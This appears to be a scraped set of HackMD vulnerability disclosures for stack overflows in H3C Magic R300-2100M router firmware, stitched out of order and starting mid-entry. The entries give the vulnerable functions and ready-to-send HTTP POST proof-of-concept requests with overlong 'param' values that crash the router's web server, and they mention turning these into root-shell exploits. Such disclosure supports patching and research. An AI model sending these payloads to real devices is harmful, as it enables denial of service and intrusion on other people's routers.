CMD=AddWlanMacList&param=1111;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://hackmd.io/\_uploads/ryypGuiEn.png) And you can write your own exp to get the root shell.

CVE-2023-33643: H3C Magic R300-2100M was discovered stack overflow via the AddWlanMacList interface at /goform/aspForm - HackMD

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the Edit_BasicSSID_5G interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the Edit\_BasicSSID\_5G interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the Edit\_BasicSSID\_5G interface at /goform/aspForm. ## Vulnerability Details !\[\](https://hackmd.io/\_uploads/H1Tdw\_jN2.png) In the Edit\_BasicSSID\_5G function, local variable v32 is 64 bytes long. !\[\](https://hackmd.io/\_uploads/SJvKvuiN2.png) V31 can be controlled by attacker, entered as parameter 'param'. In line 51, v31 is formatted into v32 by function sscanf as long as the size of the data we enter until ';' without filtering or checking length. So when the size of the data we enter before ';' is larger than 64 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://hackmd.io/\_uploads/HyT5IFjE3.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 611 CMD=Edit\_BasicSSID\_5G&param=1111;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://hackmd.io/\_uploads/r1LI7qiEn.png) And you can write your own exp to get the root shell.

CVE-2023-33638: H3C Magic R300-2100M was discovered stack overflow via the Edit_BasicSSID_5G interface at /goform/aspForm - HackMD

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the UpdateMacClone interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the UpdateMacClone interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the UpdateMacClone interface at /goform/aspForm. ## Vulnerability Details !\[\](https://i.imgur.com/XV02XyL.png) In the UpdateMacClone function, local variable v9 is 64 bytes long. !\[\](https://i.imgur.com/kfAEysE.png) V7 can be controlled by attacker, entered as parameter 'param'. In line 21, v7 is formatted into v9 by function sscanf as long as the size of the data we enter is less than 512 bytes. So when the size of the data we enter is larger than 64 bytes and less than 512 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://i.imgur.com/zcCWhYp.png) \`\`\` POST /goform/aspForm HTTP/1. Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=; UPGRADE\_SOURCE= Connection: close Content-Length: 534 CMD=UpdateMacClone&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://i.imgur.com/oOVNgxA.png) And you can write your own exp to get the root shell.

Tag

#webkit